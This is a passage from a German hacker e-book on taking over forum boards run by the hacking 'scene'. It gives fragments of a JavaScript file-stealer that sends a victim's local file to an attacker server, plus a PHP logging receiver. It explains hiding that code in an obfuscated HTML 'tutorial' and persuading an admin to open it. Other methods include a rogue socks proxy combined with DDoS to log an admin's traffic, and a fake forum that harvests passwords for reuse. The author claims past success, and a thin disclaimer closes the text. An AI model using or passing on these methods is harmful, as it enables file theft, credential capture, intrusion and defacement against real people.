line 14: location.href=”http://[server]/save.php?log=”+escape(document.x.textausgabe.value);
line 53: <p><input type=”text” name=”textfile” value=”file:///[local-file]” size=”20″>
#annahme.php
[logfile]=logfile angeben wo die daten der geklauten datei gespeichert werden zb: log.txt
[weiterleitung]=wohin das opfer schlussendlich gelinkt werden soll zb http://google.de
line 3: if (file_exists(“[logfile]“)) {
line 4: $filename=”[logfile]“;
line 7: fclose($fp); } else { $filename=”[logfile]“;
line 11: header(‘Location: [weiterleitung]‘);[/php]
wird das script im localmode ausgefuehrt, dann wird die datei vom vic uebertragen.
wichtig: sende die datei an dein vic. nicht uppe die datei und sende den link!
—
wir muessen uns dabei keine sorgen machen das dem admin das auffällt. denn wie wir wissen ist das eine methode die sehr selten und spezifisch ist. und deswegen ist es gerade zu lächerlich einem board admin aus der deutschen scene ausreichende kenntnisse zu zu schreiben, das er diesen angriff erkennen könnte. wie schon in “1.2 teamanalyse” erwähnt. hinzu kommend gelten .html dateien sowieso als unbedenklich. allerdings sollten wir den code sehr gut verstecken. bzw wir sollten viel stylischen schnickschnack mit in die html datei bringen damit unser code nicht auffällt. oder jedes zeichen als unicode ausgabe nehmen. ebenso kann es nicht schaden wenn wir die html datei grundsätzlich mit viel code oder unicode zeichen (oder jedes zeichen als unicode zeichen) zupflastern. wir wollen ja nicht gefahr laufen das der admin unser tut im texteditor liest. unser fertiges tutorial+file-stealer stellen wir dann im board online. folgend schreiben wir den admin an und empfehlen ihm unser tutorial. sollte er kein interesse zeigen, dann können wir auch notfalls die begruendung einbringen das er es sich mal ansehen soll um verbesserungen oder fehler sagen zu können. nun brauchen wir nur noch zu warten bis er sich unser tutorial zieht und es mit seinem browser öffnet. der inhalt der root.txt wird an unseren server geschickt und schon haben wir alle infos die wir zur uebernahme des servers brauchen. vorteilhaft an dieser methode ist auch das unsere html datei logischerweise mit jedem browser geöffnet werden kann. demnach ist unser script nur auf den browser angewiesen, das betriebssystem spielt also keine rolle bei diesem angriff.
3.2.3 mein nolog, loggt
der name dieses unterpunkts sagt eigentlich schon alles. ich denke mal es ist schnell erklärt^^ bei dieser methode sind wiedermal unsere ressourcen gefragt. zu aller erst besorgen wir uns die ip des vpn oder socks vom admin. wie wir das machen wissen wir ja aus “2.1 ip’s besorgen”. dann melden wir uns im forum an und erstellen einen thread in dem wir kostenlos nolog-socks anbieten. nun warten wir ein bisschen bis sich unser angebot rummgesprochen hat. dann ddosn wir den sock vom admin down. viele nutzen gehackte server auf denen sie socks installiert haben. mit einem mittelmäsigen botnet duerften wir also in den meisten fällen erfolg haben. nun gibt es zwei möglichkeiten. entweder der admin nimmt von selbst einen eurer angebotenen socks oder wir muessen ihm einen aufschwatzen. sollte er von selbst einen von euch nehmen dann haben wir schon gewonnen. ansonsten: schreiben wir den admin an und erzählen ihm von ein paar servern die wir hacked haben und ihm geben wollen. oder wie fragen ihn ob er eine seite fuer uns hackt. also, wir reden ihm ein paar dinge ein damit er von ganz allein nach einem sock fragt. sollte er nicht fragen dann schicken wir ihm einfach einen. egal ob er danach gefragt hat oder nicht. einfach mal den sock+logindaten dem admin geben. glaubts mir leute, in der not frisst der teufel fliegen was der admin mit sicherheit nicht wissen wird ist, das wir im gegensatz zu ihm wissen das die socks5 verschluesselung alles andere als perfekt ist. da uns der sock gehört und wir den server unter der fuchtel haben, können wir nun frei alle handlungen des admins loggen. im grunde muessen nun nur noch warten bis der admin sich ueber unseren sock im acp des boards einloggt.
3.3 meine projekte
an dieser stelle sollte erstmal jedem klar sein das ich hier nicht von meinen persöhnlichen projekten spreche sondern von den einzelnen methoden wie man eigene projekte zum hacken eines deutschen sceneboards nutzen kann. also nicht vom unterpunkt-titel irritieren lassen. grundregel fuer diese arten von angriffen ist: “der admin benutzt sogut wie ueberall das selbe passwort”.
3.3.1 meine crew
Im Grunde ist die Sache ganz einfach. Zu erst einmal brauchen wir ein forensystem. Am besten ein sehr bekanntes was auch viele andere scene-boards nutzen.
Das setzen wir dann auf nen server und ernennen es zum scene-board. Nun basteln wir die loginfunction ein bisschen um so das alle user+pw geloggt werden. Dann machen wir ein bisschen Werbung dafür. wenn wir ein paar user zusammen haben, sagen wir mal 20, dann fangen wir an ein paar ahnungslose nicht-scene seiten zu defacen.
Diese versehen wir mit werbung für unser board. Anschließend posten wir unsere defaces auf unserem board und auf dem board welches wir angreifen wollen. Wir verfahren eine weile so weiter bis unser Board ein bisschen bekanntheistgrad im kreise des anderen boards erreicht hat.
Nun ist es an der zeit dem admin des victim-boards eine linkpartnerschaft vor zu schlagen. Er wird sich bei uns registrieren muessen um die lage einschätzen zu können. Und hier ist auch schon ende vom Lied. Wenn er sich regt wird das passwort geloggt und wir können es auf sein board anwenden. Notfalls können wir dem admin auch vorschlagen einen besonderen titel in unserem board zu bekommen zb. “linkpartner” usw…
Nachwort:
Alle hier beschriebenen Methoden wurden von mir selbst schon erfolgreich durchgeführt. Natürlich sind diese Taktiken nicht 1zu1 durchführbar, bzw. man muss sie logischerweise angepasst an die gegebenheiten handhaben.
Jeder der mit social engineering arbeitet ist darauf bedacht auch nach dem angriff unentdeckt zu bleiben. Allerdings kann man auch mal pech haben aber gerade deswegen kann ich hier auch mal eine Referenz für die beschriebenen Angriffstalktiken einbringen:
“3.1.1 bug fixen” > http://scenewiki.wordpress.com/2010/04/18/cyberterrorists-defaced/
vllt. noch ein wort dazu: dieser hack war eher ein fehler. bzw. ich hätte die seite nicht defacen duerfen dann wäre ich auch nicht aufgefellen XD ebenso ist dieser admin “bursali” ein typ der ganz ok ist. es war also eher unberechtigt von mir ihm so in die suppe zu pissen XD
Dieses E-Book darf nur in unabgeänderter form frei kopiert werden. (der gesamte text, auch dieser satz hier, vorwort & nachwort)
Dieses E-Book dient lediglich zur Aufdeckung sowie dem verständniss und der behebung von sicherheitsschwachstellen in deutschen scene-boards.
Ich distanziere mic von jeglichem schaden der durch dieses e-book entstehen kann und weise alle leser darauf hin das die hier gebotenen informationen nicht für kriminelle zwecke missbrauch werden dürfen.
—
greetz unnex
Quelle : http://www.webhost-news.info/